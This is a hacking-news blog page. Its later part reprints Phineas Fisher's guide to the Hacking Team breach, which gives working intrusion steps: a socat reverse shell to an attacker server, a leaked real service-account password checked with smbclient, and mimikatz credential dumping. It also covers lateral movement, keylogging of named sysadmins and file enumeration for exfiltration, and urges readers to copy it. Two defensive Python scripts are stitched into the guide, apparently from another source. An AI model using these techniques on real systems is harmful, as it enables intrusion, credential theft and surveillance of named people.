Learn Penetration Testing And Ethical Hacking Online.


    Showing posts with label Hacking News.
    Top 25 most important software weaknesses

    There are many vulnerabilities that can affect our security from day to day: flaws in the software we use, in our network connections or in our devices can all be a threat. In this article we echo a list published by MITRE that shows the 25 main software weaknesses behind the serious vulnerabilities that can affect our security. Let's talk about it.

    25 most important software weaknesses

    There are many errors that can affect the programs we use and the tools built into our devices. They are part of our day to day. However, some of these vulnerabilities represent a more serious threat than others.

    MITRE, an American company dedicated to systems engineering, research and development, has released a list of the 25 most important software weaknesses. It indicates that these errors can be easily exploited and, ultimately, used by an attacker to take control of a system.

    Because of these vulnerabilities, which are considered important, an attacker could steal confidential data, render certain software unusable, or launch various attacks.

    MITRE's main objective in making this list public is for software developers to use it as a guide to controlling these vulnerabilities. This way they can create more secure software that does not put users' security at risk, or at least reduces that risk as much as possible.

    Keep in mind that these 25 weaknesses were not chosen at random or by opinion. To reach this ranking they applied a formula that combines different scores to give each weakness a final rating. In this way they can draw up a definitive list of the weaknesses that are both the most prevalent and the most dangerous.

    The list is based on vulnerabilities reported around the world. Each weakness is given a name and, next to it, a rating, the CVSS score, which indicates which ones are the most dangerous and, in short, which ones developers have to be most careful with.

    Main vulnerabilities according to MITRE

    If we start with the top 5, the most important weakness for MITRE, and the one with the highest score, is the improper restriction of operations within the bounds of a memory buffer. It has been assigned the identifier CWE-119 and has a score of 75.56.

    The second is the improper neutralization of input during web page generation (cross-site scripting). It has a score of 45.69 and is identified as CWE-79.

    Next come, respectively, improper input validation, with a score of 43.61 and identified as CWE-20; information exposure, identified as CWE-200 with a score of 32.12; and, closing the top 5, CWE-125, out-of-bounds read, with a score of 26.53.

    These are the five main weaknesses according to MITRE. However, the full list they released has 25 entries. The remaining 20 are the following (CWE identifier, name and score):

    • CWE-89 Improper Neutralization of Special Elements used in an SQL Command ("SQL Injection") 24.54
    • CWE-416 Use After Free 17.94
    • CWE-190 Integer Overflow or Wraparound 17.35
    • CWE-352 Cross-Site Request Forgery (CSRF) 15.54
    • CWE-22 Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") 14.10
    • CWE-78 Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection") 11.47
    • CWE-787 Out-of-bounds Write 11.08
    • CWE-287 Improper Authentication 10.78
    • CWE-476 NULL Pointer Dereference 9.74
    • CWE-732 Incorrect Permission Assignment for Critical Resource 6.33
    • CWE-434 Unrestricted Upload of File with Dangerous Type 5.50
    • CWE-611 Improper Restriction of XML External Entity Reference 5.48
    • CWE-94 Improper Control of Generation of Code ("Code Injection") 5.36
    • CWE-798 Use of Hard-coded Credentials 5.12
    • CWE-400 Uncontrolled Resource Consumption 5.04
    • CWE-772 Missing Release of Resource after Effective Lifetime 5.04
    • CWE-426 Untrusted Search Path 4.40
    • CWE-502 Deserialization of Untrusted Data 4.30
    • CWE-269 Improper Privilege Management 4.23
    • CWE-295 Improper Certificate Validation 4.06
    New Linux malware mines cryptocurrency while remaining undetected

    Two threat analysts recently discovered a new Linux malware that conceals its cryptocurrency mining operations.

    On 16 September, Augusto Remillano II and Jakub Urbanec revealed in a post on the Trend Micro security intelligence blog that they had discovered a new malware. According to the analysts, this malware is particularly notable for the way it loads malicious kernel modules to mask its cryptocurrency mining operations.

    Malware gives hackers full access to the infected machine

    The analysts found that Skidmap hides its cryptocurrency mining using a rootkit, a program that installs and executes code on a system without the consent or knowledge of the end user. This makes its malicious components undetectable by the infected system's monitoring tools.

    In addition to running a cryptojacking campaign on the infected machine, the malware gives attackers "unfettered access" to the affected system. The analysts add:

    "Skidmap also sets up a backdoor way to get access to the machine and also replaces the system's pam_unix.so file with its own malicious version. This malicious file accepts a specific password for all users, allowing attackers to log in as any user of the machine."

    Cryptojacking campaigns up 29%

    Cryptojacking is the industry term for stealthy crypto-mining attacks, in which malicious software or some other means uses a computer's processing power to mine cryptocurrency without the consent or knowledge of the owner.

    In August, the cybersecurity company McAfee Labs released a report on threats in the first quarter of 2019. According to the report, cryptojacking campaigns increased by 29%.
    Simjacker vulnerability allows hackers to hack into any phone simply by sending an SMS

    Vulnerability in SIM-cards, how to protect against Simjacker

    The Simjacker vulnerability could affect more than 1 billion mobile phone users worldwide.

    A new and previously unrecognized critical vulnerability has been discovered in SIM cards, which could allow remote attackers to compromise targeted mobile phones and spy on victims simply by sending an SMS message.

    This vulnerability, dubbed "Simjacker," lies in a piece of software called S@T Browser (a dynamic SIM toolkit) embedded in most SIM cards, which is widely used by mobile operators in at least 30 countries and can be exploited no matter what phone the victim uses.

    Worse still, a private company that works with governments has been actively exploiting the Simjacker vulnerability for at least the past two years to conduct targeted surveillance of mobile phone users in several countries.

    S@T Browser, short for SIMalliance Toolbox Browser, is an application installed on various SIM cards, including eSIM, as part of the SIM Tool Kit (STK), and is designed to enable mobile operators to provide basic services, subscriptions and value-added wireless services to their customers.

    Because the S@T Browser contains a number of STK instructions — such as sending a short message, setting up a call, launching a browser, providing local data, running on command, and sending data — that can be triggered simply by sending an SMS message to the device, the software offers a runtime environment for running malicious commands on mobile phones.

    How does the Simjacker Vulnerability work?

    Discovered by researchers from AdaptiveMobile Security in a new study published on September 12, 2019, the vulnerability can be exploited using a $10 GSM modem to perform the tasks listed below on a target device, simply by sending an SMS message containing a certain type of spyware-like code.
    • Retrieving the location of the target device and IMEI information,
    • Spreading false information by sending fake messages on behalf of the victims,
    • Performing premium rate fraud by dialing premium rate numbers,
    • Spy on the surroundings of victims by ordering the device to call the attacker’s phone number,
    • The spread of malware, forcing the victim’s phone browser to open a malicious web page,
    • Perform denial of service attacks by disconnecting the SIM card and
    • Getting other information, such as language, type of radio, battery level, etc.
    “During the attack, the user is completely unaware that they received the attack, that the information was extracted and that it was successfully deleted,” the researchers explain.

    This attack is also unique in that the Simjacker attack message can logically be classified as carrying a full malware payload, specifically spyware, because it contains a list of instructions that the SIM card must execute. Simjacker is the first real attack in which spyware is sent directly via SMS.

    Although the technical details, a detailed document and a proof of concept of the vulnerability are planned for publication in October this year, the researchers said they observed real attacks on users with devices from almost all manufacturers, including Apple, ZTE, Motorola, Samsung, Google, Huawei and even IoT devices with SIM cards.

    It turns out that all manufacturers and models of mobile phones are vulnerable to SimJacker attacks, since this vulnerability uses outdated technology built into SIM cards, the specification of which has not been updated since 2009, which potentially puts more than a billion people at risk.
    Simjacker vulnerability in the wild

    Researchers say that the Simjacker attack worked very well and has been used successfully for many years, "because it used a combination of sophisticated interfaces and obscure technologies, showing that mobile operators cannot rely on standard installed security features."

    “Simjacker is a clear danger to mobile operators and subscribers. This is potentially the most sophisticated attack that has ever existed on major mobile networks,” said Cathal McDaid, CTO at AdaptiveMobile Security, in a press release.

    “This is a major wake-up call that shows hostile actors are investing heavily in increasingly sophisticated and creative ways to undermine network security. This threatens the security and trust of customers and mobile operators, and affects the national security of entire countries.”

    Moreover, now that this vulnerability has been publicly disclosed, researchers expect hackers and other attackers to "develop these attacks in other areas."

    The researchers responsibly disclosed the details of this vulnerability to the GSM Association, the trade body representing the mobile operator community, as well as to the SIM alliance, which represents the main SIM card / UICC manufacturers.

    SIMalliance acknowledged the issue and provided security recommendations to SIM card manufacturers for S@T push messages.

    Mobile operators can also immediately eliminate this threat by setting up a process to analyze and block suspicious messages containing S@T Browser commands.

    We, as potential victims and users of mobile devices, can do nothing if we use a SIM card with S@T Browser technology deployed on it, except ask for the SIM card to be replaced with one that has proprietary security mechanisms installed.

    More information about Simjacker can be found at www.simjacker.com, and Cathal McDaid, CTO of AdaptiveMobile Security, will present Simjacker at the Virus Bulletin Conference, London, October 3, 2019.
    Kali Linux 2020: news and download of this distribution of ethical hacking

    When we talk about Kali Linux, we mean one of the most important and best known ethical hacking suites worldwide. It offers users a wide range of possibilities, and that makes many people pay attention to the news of each new version. In this article we echo the news of Kali Linux 2020, and explain how to download this Linux distribution.

    As often happens with each new update, whatever the type of program or system, improvements come with it. These improvements translate into new functions or tools that benefit users' day-to-day work. But keep in mind that each new version also corrects existing problems.

    Kali Linux allows users to perform different ethical hacking tests. Now they have a series of novelties that make this Linux distribution even more attractive. We are facing the third update of this current version. We will comment on the most important changes.

    What's new in Kali Linux 2020

    One of the novelties of Kali Linux 2020 that we can mention is that they have started using the Cloudflare CDN to host the repository and distribute content to users. They do this to improve the quality and speed of downloads.

    There are also changes regarding metapackages. There is now an additional, unique image called kali-linux-large-2020-amd64.iso.

    Kali Linux 2020 is not a major update with very significant changes; however, it has improved certain applications, for example tools like Burp Suite, HostAPd-WPE, Hyperion, Kismet and Nmap. All of them have been updated to a new version and include improvements.

    One of the significant changes regarding applications is that it now includes Amass, a tool that security professionals can use to map the network and discover possible external threats. This tool now comes standard with Kali Linux.

    For the rest, it should also be mentioned that bugs and security errors have been fixed. Corrections that, in short, make this new version safer.

    How to get Kali Linux 2020

    It should be mentioned that users who already have this distribution installed and up to date will not have much to do. They simply have to run the command apt update && apt -y full-upgrade as root (root@kali:~#) to make sure they have the most current version.
    For those users who do not have it installed or want to obtain the ISO for some reason, it is best to go to the official website. There you just have to go to the download section and download the version you want (64-bit, 32-bit ...).

    As we always say, it is important to download software from official and trusted sites. We must avoid doing it from third-party links when we do not really know who they belong to or what could be behind them.

    In addition, keeping systems updated brings important benefits. On the one hand we will have the most up-to-date tools and thus gain performance improvements. But security is also very important: security vulnerabilities that cybercriminals can exploit are patched with each new update.
    Phineas Fisher explains how he hacked Hacking Team

    Hacking Team's leak was worldwide news, but little was known about the author or how he did it. That mystery has finally been revealed. After eight months of almost complete silence, Phineas Fisher, the pseudonym of the person who carried out the attack, has published a DIY (Do It Yourself) guide in Spanish with a detailed explanation of the tools and of how he broke the security of the company's systems and uncovered its best kept secrets, such as some of its clients in Spain: the CNI, the Civil Guard and the Police.

    Hacking Team was a company that helped governments hack and spy on journalists, activists, political opponents and other threats to their power, and, very occasionally, criminals and terrorists. Vincenzetti, the CEO, liked to finish his emails with the fascist slogan "boia chi molla". It would be more accurate to say "boia chi sells RCS". They also claimed to have technology to solve the "problem" of Tor and the darknet.

    Phineas Fisher snuck into the Hacking Team network silently and leaked more than 400 gigabytes of data, but the guide also serves as a manifesto of his political ideals and of the motives behind the access.

    Before, someone had to sneak into the offices to leak documents. A gun was needed to rob a bank. Today you can do it from bed with a laptop in your hands. As the CNT said after the hacking of the Gamma Group: "we will try to take a step forward with new forms of struggle". Hacking is a powerful tool, let's learn and fight!

    At the end of the guide the author comments:

    And that's all it takes to end a business and end its human rights abuses
    With only 100 hours of work, a person can undo years of work from a multi-million dollar company. 

    In the guide, Phineas Fisher encourages others to follow his example

    Phineas Fisher argued that leaking documents to demonstrate corruption and abuse of power is really " ethical hacking ," instead of doing consulting work for companies that are often the ones that really deserve to be hacked. 

    Hacking Team is an Italian company that sells spyware and hacking services to police and intelligence services around the world. Over the years, researchers have documented several cases in which Hacking Team tools were used against journalists, dissidents, or activists. 

    On the night the hacker published the data, he revealed himself to be the same person who in 2014 had also hacked Gamma International, a competitor of Hacking Team that sells spyware called FinFisher.

    For months, however, a big question went unanswered: how did the hacker manage to break into and completely own a company whose business model depended precisely on hacking other people?

    At that moment, the hacker promised that he would soon tell the world. He just wanted to wait a little while, he said on Twitter, until Hacking Team "had a little time to fail to figure out what happened and go out of business."

    In his guide, published on Friday, the hacker explained how he used an unknown vulnerability, or zero-day (0day), to obtain an initial foothold in Hacking Team's internal network. Bearing in mind that the bug has not yet been patched, however, Phineas Fisher did not provide any details about what the vulnerability is exactly or where he found it.

    After getting in, the hacker said he moved around carefully, first downloading emails, then accessing other servers and parts of the network. Having obtained administrative privileges within the company's main Windows network, Phineas Fisher said he spied on the system administrators, especially Christian Pozzi, given that they generally have access to the entire network. After stealing Pozzi's passwords by recording his keystrokes, the hacker said he accessed and exfiltrated all of the company's source code, which was housed in a separate, isolated network.

    At that point, he reset the Hacking Team Twitter password with the "Forgot your password" function, and on July 5 announced the hack using the company's own Twitter account.

    The hacker said that he was inside the Hacking Team network for six weeks, and that it took him about 100 hours of work to get around and get all the data. Judging by his words, it is clear Phineas Fisher had a strong political motivation for the Hacking Team's computer attack.

    I want to dedicate this guide to the victims of the assault on the Armando Díaz school, and to all those whose blood was shed by the Italian fascists

    This refers to the bloody raid on the Italian school in Genoa in 2001, when police forces broke into a school that housed activists of the Genoa Social Forum protesting the G8 summit, resulting in the arrest of 93 activists. The methods of the raid and the subsequent arrests, however, were so controversial that 125 police officers were put on trial, accused of beating and torturing the detainees.

    The hacker also rejected being defined as a vigilante, and opted for a more political definition.

    "I characterize myself as an anarchist revolutionary, not as a vigilante," he said in an email. "Vigilantes act outside the system, but intend to carry out the work of the judicial system and the police, none of which I am a fan of. I am clearly a criminal; it is not clear whether Hacking Team has done anything illegal. If anyone, Hacking Team are the vigilantes, who act on the margins in pursuit of their love for authority and law and order."

    Hacking gives the weakest the opportunity to fight and win

    Hacking is a powerful tool. Let's learn and fight!

    he wrote, citing the anarcho-syndicalist union Confederación Nacional del Trabajo, or CNT. After Phineas Fisher hacked Gamma Group in 2014, the CNT said that technology was clearly just another front in the class struggle, and that it was time to "take a step forward" with "new forms of struggle."

    It is impossible to verify whether all the details in the guide are true, since neither Hacking Team nor the Italian authorities have disclosed everything related to the hack.

    "Any comments should come from the Italian law enforcement authorities who have been investigating the attack on Hacking Team, so there is no comment from the company," Hacking Team spokesman Eric Rabe said in an email. The Italian prosecutor's office could not be reached for comment.

    It is not clear how the investigation is going, but Phineas Fisher does not seem too concerned about whether he will be caught. In another section of his guide, he described Hacking Team as a company that helped governments spy on activists, journalists, political opponents and, "very occasionally," criminals and terrorists. The hacker also referred to Hacking Team's claims that it was developing technology to track criminals using the Tor network and the dark web.

    "But considering that I'm still free," he wrote snarkily, "I have doubts about its effectiveness."


    It often comes out in the news that an attack has been attributed to a group of government hackers (the "APTs") because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc.). They are negligent because they can hack without legal consequences.

    I did not want to make the police's work easier by linking the Hacking Team hack with the hacks and nicknames of my daily work as a black hat hacker. So I used new servers and domains, registered with new emails and paid for with new bitcoin addresses. In addition, I only used public tools and things I wrote especially for this attack, and changed my way of doing some things so as not to leave my usual forensic footprint.

    After the Gamma Group hack, I described a process to look for vulnerabilities. 

     Hacking Team has a public IP range: 
    inetnum: - 
    descr: HT public subnet

    Hacking Team had very little exposed on the internet. For example, unlike Gamma Group, its customer support site requires a client certificate to connect. What it had was its main website (a Joomla blog where Joomscan does not reveal any serious flaws), a mail server, a couple of routers, two VPN devices, and a spam filtering device. So I had three options:

    1. look for a 0day in Joomla,
    2. look for a 0day in postfix, or
    3. look for a 0day in one of the embedded systems.

    A 0day in an embedded system seemed to me the most achievable option, and after two weeks of reverse engineering work, I achieved a remote root exploit. Since the vulnerabilities have not yet been patched, I will not give more details.

    There was a lot of work and testing before using the exploit against Hacking Team.

    I wrote a backdoored firmware and compiled several post-exploitation tools for the embedded system. The backdoor serves to protect the exploit: using the exploit only once and then returning through the backdoor makes it harder to discover and patch the vulnerabilities.

    Tools used in the attack to Hacking Team

    The post-exploitation tools I had prepared were:

    1) busybox: for all the common UNIX utilities that the system does not have.
    2) nmap: to scan and fingerprint the internal Hacking Team network.
    3) Responder.py: the most useful tool for attacking Windows networks when you have access to the internal network but do not have a domain user.
    4) Python: to run Responder.py.
    5) tcpdump: to sniff traffic.
    6) dsniff: to sniff passwords from weak protocols like ftp, and to do arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGA from Hacking Team, but it was difficult to compile it for the system.
    7) socat: for a comfortable shell with a pty. On my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port. On the hacked system: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:my_server:my_port. And for many more things; it's a Swiss army knife. See the examples section of its documentation.
    8) screen: like the pty of socat, it is not strictly necessary, but I wanted to feel at home in the Hacking Team networks.
    9) a SOCKS proxy server: to use together with proxychains to access the internal network with any other program.
    10) tgcd: to forward ports, like the SOCKS server, through the firewall.

    The worst that could happen was that my backdoor or post-exploitation tools left the system unstable and had an employee investigate it. Therefore, I spent a week testing my exploit, backdoor, and post-exploitation tools on the networks of other vulnerable companies before entering the Hacking Team network.

    NoSQL database

    NoSQL, or rather NoAuthentication, has been a great gift to the hacker community. Just when I was worried that they had finally patched all the authentication bypass bugs in MySQL [2] [3] [4] [5], new databases come into fashion with no authentication by design. Nmap finds a few on Hacking Team's internal network:

    27017/tcp open mongodb MongoDB 2.6.5
    ok = 1
    totalSizeMb = 47547
    totalSize = 49856643072
    |_ version = 2.6.5

    27017/tcp open mongodb MongoDB 2.6.5
    ok = 1
    totalSizeMb = 31987
    totalSize = 33540800512
    |_ version = 2.6.5

    They were the databases for RCS test instances. The audio recorded by RCS is saved in MongoDB with GridFS. The audio folder in the torrent [6] comes from here. They spied on themselves unintentionally.

    Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it was not very useful. Their insecure backups were the vulnerability that opened their doors. According to its documentation [1], its iSCSI devices must be on a separate network, but nmap finds some in its subnet:

    Nmap scan report for ht-synology.hackingteam.local (
    3260/tcp open iscsi?
    Target: iqn.2000-01.com.synology:ht-synology.name
    |_ Authentication: No authentication required

    Nmap scan report for synology-backup.hackingteam.local (
    3260/tcp open iscsi?
    Target: iqn.2000-01.com.synology:synology-backup.name
    |_ Authentication: No authentication required

    and we found backup copies of several virtual machines. The Exchange server seems the most interesting. It's too big to download, but we can mount it remotely and look for interesting files:

    $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
    $ fdisk -l /dev/loop0
    /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

    then the offset is 2048 * 512 = 1048576

    $ losetup -o 1048576 /dev/loop1 /dev/loop0
    $ mount -o ro /dev/loop1 /mnt/exchange/

    now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
    we find the virtual machine's hard disk, and mount it:

    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
    mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

    ... and finally we have unpacked the Russian doll and we can see all the files of the old Exchange server in /mnt/part1
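The scan results above point at two misconfigurations a defender should be hunting for on their own network: database services that answer without credentials and iSCSI targets that require no authentication. The following Python audit is an added example, not part of the guide, that walks nmap normal-format output (a constructed sample modelled on the results above, with placeholder hostnames and addresses) and reports both conditions together with the fix each one needs.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap normal-format output, modelled on the scan
# results quoted in the guide. Hostnames and addresses are placeholders.
SAMPLE_SCAN = """\
Nmap scan report for db-test-1.example.local (10.0.0.21)
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|_  version = 2.6.5

Nmap scan report for nas-backup.example.local (10.0.0.40)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-backup.name
|_    Authentication: No authentication required

Nmap scan report for nas-secure.example.local (10.0.0.41)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-secure.name
|_    Authentication: CHAP required

Nmap scan report for web-1.example.local (10.0.0.5)
80/tcp open  http nginx
"""


@dataclass
class Finding:
    host: str
    port: int
    service: str
    reason: str
    fix: str


def parse_hosts(text):
    """Split nmap normal output into (host, lines belonging to that host) pairs."""
    hosts, current, lines = [], None, []
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            if current is not None:
                hosts.append((current, lines))
            current, lines = m.group(1), []
        elif current is not None:
            lines.append(line)
    if current is not None:
        hosts.append((current, lines))
    return hosts


def audit(text):
    """Return a Finding for every service that answered without authentication."""
    findings = []
    for host, lines in parse_hosts(text):
        block = "\n".join(lines)
        for m in re.finditer(r"^(\d+)/tcp\s+open\s+(\S+)", block, re.M):
            port, service = int(m.group(1)), m.group(2).rstrip("?")
            # NSE script output for this port runs until the next port line.
            tail = block[m.end():]
            nxt = re.search(r"^\d+/tcp", tail, re.M)
            script = tail[:nxt.start()] if nxt else tail
            # mongodb-databases prints the listDatabases reply; "ok = 1" means
            # the unauthenticated request succeeded, i.e. authorization is off.
            if service == "mongodb" and re.search(r"\bok = 1\b", script):
                findings.append(Finding(host, port, service,
                    "listDatabases succeeded without credentials (ok = 1)",
                    "enable authorization and bind the service to the management network"))
            # iscsi-info reports whether the target demands CHAP before login.
            if service == "iscsi" and "No authentication required" in script:
                findings.append(Finding(host, port, service,
                    "iSCSI target exposed with no CHAP authentication",
                    "require CHAP and move storage targets to an isolated SAN segment"))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SCAN):
        print(f"{f.host}:{f.port} {f.service}: {f.reason} -> {f.fix}")
```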

     What were the passwords of the Hacking Team administrators?

    What interests me most about the backup is finding out whether it has a password or hash that I can use to access the current server. I use pwdump, cachedump, and lsadump [1] with the registry files. lsadump finds the password for the besadmin service account:

    _SC_BlackBerry MDS Connection Service 
    0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
    0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 bes3. 
    0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........

    I use proxychains [2] with the SOCKS server on the embedded system and smbclient [3] to check the password:

    proxychains smbclient '//$' -U 'hackingteam.local/besadmin%bes32678!!!'

    It works! The besadmin password is still valid, and it is a local administrator. I use my proxy and psexec_psh from metasploit [4] to get a meterpreter session. Then I migrate to a 64-bit process, "load kiwi" [5], "creds_wdigest", and I already have many passwords, including the domain administrator's password. Hacking Team employees' passwords were:

    Note Christian Pozzi's password: P

    Introduction to Windows Domain Hacking

    I will give a brief review of the techniques for spreading within a Windows network. The techniques for running things remotely require the password or hash of a local administrator on the target. By far the most common way to get these credentials is to use mimikatz [1], especially sekurlsa::logonpasswords and sekurlsa::msv, on computers where you already have administrative access. The "in situ" movement techniques also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp [2] and bypassuac [3].

    Remote movement:

    1) psexec

    The basic and proven way to move in Windows networks. You can use psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from PowerShell Empire [4], or the Windows command "sc" [5]. For the metasploit module, PowerShell Empire, and pth-winexe [6], it is enough to know the hash without knowing the password. It is the most universal way (it works on any computer with port 445 open), but also the least stealthy. An event of type 7045 "Service Control Manager" will appear in the event log. In my experience, they have never noticed it during a hack, but sometimes they notice it later and it helps investigators understand what the hacker has done.

    2) WMI

    The most stealthy way. The WMI service is enabled on all Windows computers, but except on servers, the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (here is a demonstration of wmiexec and pth-wmis [8]), invoke_wmi from PowerShell Empire [9], or the Windows command wmic [5]. All except wmic only need the hash.

    3) PSRemoting [10] 

    It is disabled by default, and I do not advise you to enable new protocols that are not necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything; this is going to change [11] with powershell 5 and windows 10, but nowadays powershell makes it easy to do everything in RAM, dodge antivirus, and leave few traces). 

    4) Scheduled tasks 

    Programs can be executed remotely with at and schtasks [5]. It works in the same situations as psexec, and also leaves known traces [12]. 

    5) GPO

    If all these protocols are disabled or blocked by the firewall, once you are domain administrator you can use GPO to push a logon script, install an msi, execute a scheduled task [13], or, as we will see with Mauro Romeo's computer (sysadmin of Hacking Team), enable WMI and open the firewall through GPO. 

    Movement "in situ":

    1) Impersonating tokens 

    Once you have administrative access to a computer, you can use the tokens of other users to access resources in the domain. Two tools for this are incognito [1] and the token::* commands of mimikatz [2]. 

    2) MS14-068 

    A validation flaw in kerberos can be used to generate a domain administrator ticket [3] [4] [5]. 

    3) Pass the Hash 

    If you have a user's hash but that user does not have a session open, you can use sekurlsa::pth [2] to get a ticket for the user. 

    4) Process Injection

    Any RAT can be injected into another process, for example with the migrate command in meterpreter and pupy [6], or psinject [7] in powershell empire. You can inject into the process that holds the token you want. 

    5) runas 

    This is sometimes very useful because it does not require administrator privileges. The command is part of windows, but if you do not have a graphical interface you can use powershell [8].

    Persistence: maintain access

    Once you have access, you want to keep it. Actually, persistence is only a challenge for bastards like those of Hacking Team who want to hack activists or other individuals. To hack companies, you do not need persistence because companies never sleep. I always use "persistence" like duqu 2, running in RAM on a couple of servers with high uptime. In the hypothetical case that they all restart at the same time, I have passwords and a golden ticket [1] as backup access. You can read more about persistence mechanisms for windows here [2] [3] [4]. But to hack companies it is not necessary, and it increases the risk of detection.

    The best tool today for understanding Windows networks is Powerview [1]. It is worth reading everything written by its author [2], above all [3], [4], [5], and [6]. Powershell itself is also very powerful [7]. As there are still many 2003 and 2000 servers without powershell, you also have to learn the old school [8], with tools like netview.exe [9] or the windows command "net view". Other techniques that I like are: 

    1) Download a list of file names 

    With a domain administrator account, you can download a list of all file names in the network with powerview:

    Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
    select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
    select fullname | out-file -append files.txt}

    Later, you can read the list at your leisure and choose which files you want to download. 

    2) Read emails 

    As we have seen, you can download emails with powershell, and they contain a lot of useful information. 

    3) Read sharepoint 

    It is another place where many companies keep important information. It can be downloaded with powershell [10]. 

    4) Active Directory [11] 

    It has a lot of useful information about users and computers. Even without being a domain administrator, you can find a lot of information with powerview and other tools [12]. After getting domain administrator, you should export all AD information with csvde or another tool. 

    5) Spy on employees

    One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi (sysadmin of Hacking Team), I got access to the Nagios server, which gave me access to the rete sviluppo (the development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee or even the entire domain.
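    The share walk in point 1 above touches every share on every server in a short time, which is a pattern a file-server audit trail records: with "Audit File Share" enabled, each access to a share produces Security event 5140 with the account, the client address and the share name. The following is an added example, not part of this guide or of PowerView: a Python sliding-window rule that flags an account touching many distinct (server, share) pairs inside a few minutes. The threshold and window are assumed tuning values, the record layout is a plain dict with 5140's field names, and all hosts, accounts and timestamps are constructed.

```python
"""Flag accounts that touch many distinct shares in a short window, the
footprint a share-enumeration sweep leaves in Security event 5140.
Added example; the records below are constructed, not real telemetry."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Tuning values are assumptions; calibrate against a baseline of normal activity.
DEFAULT_THRESHOLD = 10            # distinct (server, share) pairs within one window
DEFAULT_WINDOW = timedelta(minutes=5)


def share_sweeps(events, threshold=DEFAULT_THRESHOLD, window=DEFAULT_WINDOW):
    """Return {account: largest number of distinct shares seen inside one
    window} for every account that crosses the threshold.  Only 5140 records
    are considered; anything else in the stream is ignored."""
    per_account = defaultdict(list)
    for ev in events:
        if ev["id"] == 5140:
            per_account[ev["SubjectUserName"]].append(ev)

    alerts = {}
    for account, recs in per_account.items():
        recs.sort(key=lambda r: r["ts"])
        recent = deque()                      # records inside the current window
        for rec in recs:
            recent.append(rec)
            while rec["ts"] - recent[0]["ts"] > window:
                recent.popleft()              # drop records older than the window
            distinct = {(r["host"], r["ShareName"]) for r in recent}
            if len(distinct) >= threshold:
                alerts[account] = max(alerts.get(account, 0), len(distinct))
    return alerts


def event_5140(ts, host, share, user, ip):
    """Build one constructed 5140 record with the fields the rule reads."""
    return {"id": 5140, "ts": ts, "host": host, "ShareName": share,
            "SubjectUserName": user, "IpAddress": ip}


def sample_events():
    """Constructed log: one sweep from a single client plus ordinary use."""
    t0 = datetime(2024, 1, 15, 3, 0, 0)
    events = []
    # Sweep: 6 file servers x 2 shares each, two seconds apart, from one IP.
    n = 0
    for srv in range(1, 7):
        for share in ("\\\\*\\Data", "\\\\*\\Projects"):
            events.append(event_5140(t0 + timedelta(seconds=2 * n), f"FS0{srv}",
                                     share, "da_admin", "10.0.0.50"))
            n += 1
    # Ordinary user: two shares on one server, spread over an hour.
    for i, share in enumerate(("\\\\*\\Data", "\\\\*\\Home", "\\\\*\\Data")):
        events.append(event_5140(t0 + timedelta(minutes=20 * i), "FS01",
                                 share, "alice", "10.0.0.23"))
    return events


if __name__ == "__main__":
    for account, count in share_sweeps(sample_events()).items():
        print(f"possible share sweep by {account}: {count} distinct shares in one window")
```

    On the constructed log the rule reports da_admin with 12 distinct shares and nothing for alice. In practice the noisiest false positives are backup agents, antivirus scanners and DFS replication accounts, which should be excluded by name before alerting; the IpAddress field is kept in the record so a hit can be tied back to the workstation the sweep ran from.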

    When I read the documentation of their infrastructure [1], I realized that I still lacked access to something important - the "Rete Sviluppo", an isolated network that stores all the source code of RCS. The sysadmins of a company always have access to everything. I searched the computers of Mauro Romeo and Christian Pozzi to see how they managed the sviluppo network, and to see if there were other interesting systems that I should investigate. It was easy to access their computers since they were part of the Windows domain where I already had admin. Mauro Romeo's computer had no open port, so I opened the WMI port [2] to run meterpreter [3]. In addition to recording keystrokes and screenshots with Get-Keystrokes and Get-TimedScreenshot, I used many of metasploit's /gather/ modules, CredMan.ps1 [4], and searched for files [5]. When I saw that Pozzi had a Truecrypt volume, I waited until he had mounted it and then copied the files. Many have laughed at the weak passwords of Christian Pozzi (and Christian Pozzi in general provides plenty of material for comedy [6] [7] [8] [9]). I included them in the leak as a false lead and to laugh at him. The reality is that mimikatz and keyloggers see all passwords equally.

    Within the encrypted volume of Christian Pozzi, there was a text file with many passwords [1]. One of them was for a Fully Automated Nagios server, which had access to the sviluppo network in order to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell (it is an unauthenticated exploit, but it needs a user to have logged in, for which I used the password from the text file).

